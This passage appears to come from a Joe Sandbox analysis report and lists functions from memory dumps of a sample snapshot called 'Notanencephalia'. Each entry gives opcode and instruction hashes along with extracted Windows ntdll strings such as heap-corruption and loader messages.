                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 817a786aa430d637b89300b66ff5f07aed71e60d9ed57d3aa0603b208b95caeb
                                                • Instruction ID: 20e25638e3b5926cbbfbfb70ee686dd132df83db41d7c8bbae680da3aa44b9b7
                                                • Opcode Fuzzy Hash: 817a786aa430d637b89300b66ff5f07aed71e60d9ed57d3aa0603b208b95caeb
                                                • Instruction Fuzzy Hash: 23E28C74A003559FDB55CF68C890BBABBB1FF4A304F1482ADD849AB385E735B845CB90
                                                Function 1FDF19EE Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                • API String ID: 0-1880532218
                                                • Opcode ID: 7bbd20bf0cd9f5985dde2ed667c85ce903192aa3a81fd264628cc8197611ee2b
                                                • Instruction ID: 6ddee985cc74d7cb7bc5112d5d8f36da2f5071c53c5bc094f93374a50dc5f53b
                                                • Opcode Fuzzy Hash: 7bbd20bf0cd9f5985dde2ed667c85ce903192aa3a81fd264628cc8197611ee2b
                                                • Instruction Fuzzy Hash: 5B21F735E00650ABC745CB789C51FF9B3F49F46614F1A416AE846AB381F734EA07C751
                                                Function 1FE1FCDF Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                • API String ID: 0-4256168463
                                                • Opcode ID: 0fa21a8d18a6f89b0366a709590ecd4688d2a2f2a59e2b06d12baee06a78b4f8
                                                • Instruction ID: 527cb9aa39cc3e489ba844d9f8cd04751175f53a5c953c125d159491d9e5ee80
                                                • Opcode Fuzzy Hash: 0fa21a8d18a6f89b0366a709590ecd4688d2a2f2a59e2b06d12baee06a78b4f8
                                                • Instruction Fuzzy Hash: 6701ED760186889BCB91DB69C840BE673E9EB42624F104456E4029F280EA34B84ACBE0
                                                Function 1FE43E10 Relevance: 4.6, APIs: 3, Instructions: 148timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: c0ceb43bb80b69edad2688b7afd6034ea823cbc25fc3de264c45571f1a09f259
                                                • Instruction ID: ba2ab25aeb79c50d339e475b172aa4532b10a020a1b8f052ca13b65e0ceb7922
                                                • Opcode Fuzzy Hash: c0ceb43bb80b69edad2688b7afd6034ea823cbc25fc3de264c45571f1a09f259
                                                • Instruction Fuzzy Hash: 62518A35A0071AAFCB05CF64D880B9EBBB6FF48314F244169E816DB790DB30B920DB90
                                                Function 1FE17F3E Relevance: 4.6, APIs: 3, Instructions: 85timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 7b58a0a045cad62f66982e81766d647e9af9f8c04c2c3d250b6c5f3b06336537
                                                • Instruction ID: c767f35a93d046d52ff7ad4cf6a03c0cac00a3b80744cb04d153a003bea540e5
                                                • Opcode Fuzzy Hash: 7b58a0a045cad62f66982e81766d647e9af9f8c04c2c3d250b6c5f3b06336537
                                                • Instruction Fuzzy Hash: 4E31C675E0421A8BDB04DFA9C484ADEFBB5BF48760F15816AE811B7250DB35A941CF60
                                                Function 1FD81F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: e8bf1e51d17d36dd64f91123dc4128ac1b4598baf03c77aa82db9dfdef4096d2
                                                • Instruction ID: 8c68813b54e7471f9ce7eaef178dd5d64b758d216b0e751ea1df0c833e31f55a
                                                • Opcode Fuzzy Hash: e8bf1e51d17d36dd64f91123dc4128ac1b4598baf03c77aa82db9dfdef4096d2
                                                • Instruction Fuzzy Hash: 1022E074A007469FDB81CF24C894BBABBF5FF45714F248599E4858B681E736F881CBA0
                                                Function 1FE03A78 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                • API String ID: 0-1168191160
                                                • Opcode ID: 2e5e1fc088757114484881c5c7d9fd72ab20dd823781ce9144299232386fcb4e
                                                • Instruction ID: 19517fb438345daffdac0515eb89e5d59c8ee7d486c87e74040311f0a097a890
                                                • Opcode Fuzzy Hash: 2e5e1fc088757114484881c5c7d9fd72ab20dd823781ce9144299232386fcb4e
                                                • Instruction Fuzzy Hash: D5F184B5B002298FCB21EF54CC80BDAB3B5EF44708F5541E9D549A7241E735AE81CF59
                                                Function 1FD7BAA0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                                Download Yara Rule
                                                Strings
                                                • 'LDR: %s(), invalid image format of MUI file , xrefs: 1FDD3AB4
                                                • {, xrefs: 1FDD3ABD
                                                • LdrpLoadResourceFromAlternativeModule, xrefs: 1FDD3AAF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                • API String ID: 0-1697150599
                                                • Opcode ID: 84f40515b225a6ac5e1bb6aa1c0ef75c726d0d711a2913547eaaf085cfaa8a55
                                                • Instruction ID: 0f385374908f0ee79d338386545cbf215f09b28b040693f99164e759e81c408e
                                                • Opcode Fuzzy Hash: 84f40515b225a6ac5e1bb6aa1c0ef75c726d0d711a2913547eaaf085cfaa8a55
                                                • Instruction Fuzzy Hash: 87E17E346083858BD394CF24C590B7BB7E5AF84748F054A2DFA858F398EB71E945CB92
                                                Function 1FD7B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: f5b5a254f240c830e0a4c6493245197b9b9d3e1fbfbd0e2928d1b36f0ee6064b
                                                • Instruction ID: d5fe7979b46b75f8369484062b32d73319a4c33ac70f112b565a3b02dfa3a94b
                                                • Opcode Fuzzy Hash: f5b5a254f240c830e0a4c6493245197b9b9d3e1fbfbd0e2928d1b36f0ee6064b
                                                • Instruction Fuzzy Hash: 3FB1C135A047859FCB65CF64C880BBDB7B6AF44718F194629E552EB3D4EB31E840CB60
                                                Function 1FE13B60 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                • API String ID: 0-1146358195
                                                • Opcode ID: 51376099333330b1feae66d848ee422553029b7866695e016b93e371affbfeae
                                                • Instruction ID: ddfcdbc32d5ab7850d2c817200bfa27a67c4771b0747d14c490edf18bfe2465a
                                                • Opcode Fuzzy Hash: 51376099333330b1feae66d848ee422553029b7866695e016b93e371affbfeae
                                                • Instruction Fuzzy Hash: 5CA19F755083559FD751CF25C880B6BBBE8BF85B58F01092DF9859B290EB31ED04CBA2
                                                Function 1FE036EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                • API String ID: 0-318774311
                                                • Opcode ID: 70c4d99adb515ad2fe680ddfe25a0a10ca1d1eac3e04ed4a4c195f61a431148d
                                                • Instruction ID: a0d302a7478c65ea7fd007365d0f53dc326092ed807f2e9a27d426874cfa44f7
                                                • Opcode Fuzzy Hash: 70c4d99adb515ad2fe680ddfe25a0a10ca1d1eac3e04ed4a4c195f61a431148d
                                                • Instruction Fuzzy Hash: 28819975609340AFE311DB24C840FABB7E8EF85754F040A6DF9819B3A0EB74E904CB62
                                                Function 1FE4B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                • GlobalizationUserSettings, xrefs: 1FE4B834
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 1FE4B82A
                                                • TargetNtPath, xrefs: 1FE4B82F
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                • Opcode ID: c069eb71ac938561095884ff73216eb930f271ae5e32652d10e9e95e8c6fdc9c
                                                • Instruction ID: 613a013e3f244e9643ad57a58afb3b527117a8233ed4659da60caa8dd66a50b2
                                                • Opcode Fuzzy Hash: c069eb71ac938561095884ff73216eb930f271ae5e32652d10e9e95e8c6fdc9c
                                                • Instruction Fuzzy Hash: 19616272D41229ABDF61DF54DC88BE9B7B8AF44714F1501E9E508E7260DB34AE84CFA0
                                                Function 1FD6F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 1FDCE6C6
                                                • HEAP[%wZ]: , xrefs: 1FDCE6A6
                                                • HEAP: , xrefs: 1FDCE6B3
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: 0cf03fa121bc1a6b16306cdb743ac13b9e50132f29498e2d0b6766d216918f7d
                                                • Instruction ID: e29b1169a53fa527ac8be9742a85f57785192e51e037103bd4894c254c336459
                                                • Opcode Fuzzy Hash: 0cf03fa121bc1a6b16306cdb743ac13b9e50132f29498e2d0b6766d216918f7d
                                                • Instruction Fuzzy Hash: 8E51F3B5610B85EFD352CBA8C894FAABBF8EF05310F0405E5E5818B692E774F941DB60
                                                Function 1FE1DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                Download Yara Rule
                                                Strings
                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 1FE1DC32
                                                • HEAP[%wZ]: , xrefs: 1FE1DC12
                                                • HEAP: , xrefs: 1FE1DC1F
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                • API String ID: 0-3815128232
                                                • Opcode ID: 5a7cacf65785ce82f8f776d8d8f9016f99d611da967ead614dde8ce1c61073f5
                                                • Instruction ID: 9930a287eaf4d5d84e69f02d52826219cd22550e6f0ebec2dc759fe87970a608
                                                • Opcode Fuzzy Hash: 5a7cacf65785ce82f8f776d8d8f9016f99d611da967ead614dde8ce1c61073f5
                                                • Instruction Fuzzy Hash: D95114351185548BE370EE2BC8A4BB273E2EF45358F10495AE4D38F681E26BF847DB21
                                                Function 1FD71B04 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 1FDCFB4B
                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1FDCFB63
                                                • HEAP: , xrefs: 1FDCFB58
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                • API String ID: 0-1596344177
                                                • Opcode ID: 082daf00b2264765662313a5328967057007cc884e5c04b087101d72111e327d
                                                • Instruction ID: 272fbe5a5ce6d5d5d65c11ae937a23e08483eea10fe6807b158ecd389abededd
                                                • Opcode Fuzzy Hash: 082daf00b2264765662313a5328967057007cc884e5c04b087101d72111e327d
                                                • Instruction Fuzzy Hash: 28518E35A00255DFDB44CF64C484ABABBB2FF46318F158299D8549F282EB31FD42CBA0
                                                Function 1FDA16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrtls.c, xrefs: 1FDE1B4A
                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 1FDE1B39
                                                • LdrpAllocateTls, xrefs: 1FDE1B40
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-4274184382
                                                • Opcode ID: da121a0190f71d39da0036a732c39ccb52cf9fcbc3205ac301edb2ce0dce16fc
                                                • Instruction ID: ff2d0e2ad983a6b5d4adb58ed6ef54a6413d25da9807c419705005792edf0f55
                                                • Opcode Fuzzy Hash: da121a0190f71d39da0036a732c39ccb52cf9fcbc3205ac301edb2ce0dce16fc
                                                • Instruction Fuzzy Hash: 29414AB9A00609EFDB55CFA8C841ABEB7B6FF48314F104119E405A7251EB36A811CFA4
                                                Function 1FD75702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: ed760b82e7675925d855352a6734c958c7cecdcfa111f0ef2540c218557b6544
                                                • Instruction ID: b96f2810ec3279f54a7aec9d76b47548c82053a86ffa07005827b17e2fe5c569
                                                • Opcode Fuzzy Hash: ed760b82e7675925d855352a6734c958c7cecdcfa111f0ef2540c218557b6544
                                                • Instruction Fuzzy Hash: 3131B239201B46EFC7819B64C984BA9F765FF84358F405225E9458BA90DB70F820CBD1
                                                Function 1FDF98E7 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 9aa06a8ad31c5fa7996eb8d6dd8312b29f6748a139fe33a9039cf2a7aba54b5a
                                                • Instruction ID: 14a16949284063315a115c5f0ee88731bc59c0f45f0a8380d5ad32f428fd6b88
                                                • Opcode Fuzzy Hash: 9aa06a8ad31c5fa7996eb8d6dd8312b29f6748a139fe33a9039cf2a7aba54b5a
                                                • Instruction Fuzzy Hash: 4D11C432E10259ABDB049B68DC84EAEB6A9AB48760F13416EE407E3340DA71AD01C791
                                                Function 1FDF1ACB Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$AddD
                                                • API String ID: 0-2525844869
                                                • Opcode ID: 84a3754caf27973e734076ccbed14cb6008c335cd656d9603ac69b8e56075387
                                                • Instruction ID: 5e9ad844a0352649a33614859c232c371ee2237cc66e672684819321eae2c4f9
                                                • Opcode Fuzzy Hash: 84a3754caf27973e734076ccbed14cb6008c335cd656d9603ac69b8e56075387
                                                • Instruction Fuzzy Hash: A5A15672208344AFD355CF64C884FABB7E9FB86705F114A2EF99587290E770E905CB62
                                                Function 1FDA5CC0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$TargetPath
                                                • API String ID: 0-4164548946
                                                • Opcode ID: 8ce2b4db4449d4fa4d8674610a4cf2a8bd7591e6e8d08e711fb75fc8b262ef35
                                                • Instruction ID: 0b7c7fc2f19fde623c45c1e5564924d254af566d9aff06a4716a9057862adc60
                                                • Opcode Fuzzy Hash: 8ce2b4db4449d4fa4d8674610a4cf2a8bd7591e6e8d08e711fb75fc8b262ef35
                                                • Instruction Fuzzy Hash: 258101769043469FDB91CF28C884B7BBBB4BF85714F414A2DE8959B211E732EC05CB92
                                                Function 1FDFBC10 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                                • API String ID: 0-4122831824
                                                • Opcode ID: 559366eb4c81bb3948be0d198526c64b8a2acad18af6f9bea81104a9f86c8b66
                                                • Instruction ID: a06ecd26e1e608a97a758d2eea756715574cbb77e8d5888fc05e1b9ea94a631e
                                                • Opcode Fuzzy Hash: 559366eb4c81bb3948be0d198526c64b8a2acad18af6f9bea81104a9f86c8b66
                                                • Instruction Fuzzy Hash: 0E91AE755047469FC390CF28C884FBBB7E4AF88364F190A2DE596C7290EB35E946CB52
                                                Function 1FE05DA0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
